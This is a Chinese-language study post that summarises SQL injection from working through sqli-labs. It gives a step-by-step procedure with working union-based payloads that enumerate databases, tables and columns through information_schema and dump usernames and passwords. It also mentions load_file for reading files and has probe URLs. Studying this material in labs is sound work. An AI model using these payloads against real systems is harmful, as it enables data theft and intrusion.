Brief Discussion on SQL Injection
2024-04-21 01:13:57

sqli-labs是我对sql学习程度的检验,玩了几道题,我查询了相关知识点,总结了一些重要的语法以及知识点,还有类似的题型解法步骤,下面我将一一汇总

SQL注入漏洞产生的原因

SQL Injection
程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患
用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据或进行数据库操作

SQL语句

Structured Query Language
结构化的查询语言,是关系型数据库通讯的标准语言。
查询:SELECT statement FROM table WHERE condition
删除记录:DELETE FROM table WHERE condition
更新记录:UPDATE table SET field=value WHERE condtion
添加记录:INSERT INTO table field VALUES(values)

注入步骤

1首先测试正常数据,如?id=1
2)判断是否存在注入点,如在?id=1+【‘】、【and 1=1】或【and 1=2】
3)判断字段长度,列数如在?id=1+【‘】+【 order by 1 (数字任意)】,id=1‘ order by 1=1 # ,id=1' order by 1=2 #
4判断字段回显位置,如在?id=1+【‘】+【union select 1,2,3,4,5,6,7,8,9,10,11#】
5) 判断数据库信息:
利用内置函数暴数据库信息
version()版本;database()数据库;user()用户;
不用猜解可用字段暴数据库信息(有些网站不适用):
and 1=2 union all select version()
and 1=2 union all select database()
and 1=2 union all select user()
操作系统信息:and 1=2 union all select @@global.version_compile_os from mysql.user
数据库权限:

ord(mid(user(),1,1))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
6) 查找数据库名
Mysql 5 以上有内置库 information_schema,存储着mysql的所有数据库和表结构信息```union select information_schema from information_schema.schemata``` (语句在显示位)
7)查找数据库表名
```union select group_concat(table_name) from information_schema.tables where table_schema=database()```
8)查找列名
```union select group_concat(column_name) from information_schema.columns where table_name='users' --+```
9)获取值
```union select group_concat(username,password) from users--+```
或者```1' union select 1,(select 列名 from 表名),3,4#```
0)查找数据库表中所有字段以及字段值

```sql
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库(十六进制) limit 0(开始的记录,0为第一个开始记录),1(显示1条记录)—
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六进制)limit 0,1

提权
01)猜解账号密码;
02) 登陆管理员后台。
读文件: union select 绝对路径 load_file
写入文件:union select

判断SQL注入点

找注入点是最关键,也最基础的一个环节
本质原理是:
找一个需要后台处理后
提交给数据库的点
所有的输入只要和数据库进行交互的,都有可能触发SQL注入
一般为三大类

Get参数触发SQL注入
POST参数触发SQL注入
Cookie触发SQL注入

例如:
在常规的链接的参数中(链接?参数) 找形如?id=num的【,】搜索框的【,】
而验证是否存在注入点的方法有很多种
最常规,也最简单的方法,引入单引号判断是否存在注入点

http://host/test.php?id=100’ 返回错误说明有可能注入

http://host/test.php?id=100 and 1=1 返回正常

http://host/test.php?id=100 and 1=2返回错误

如果满足上面三点,是注入点的可能性就很高了

Prev
2024-04-21 01:13:57
Next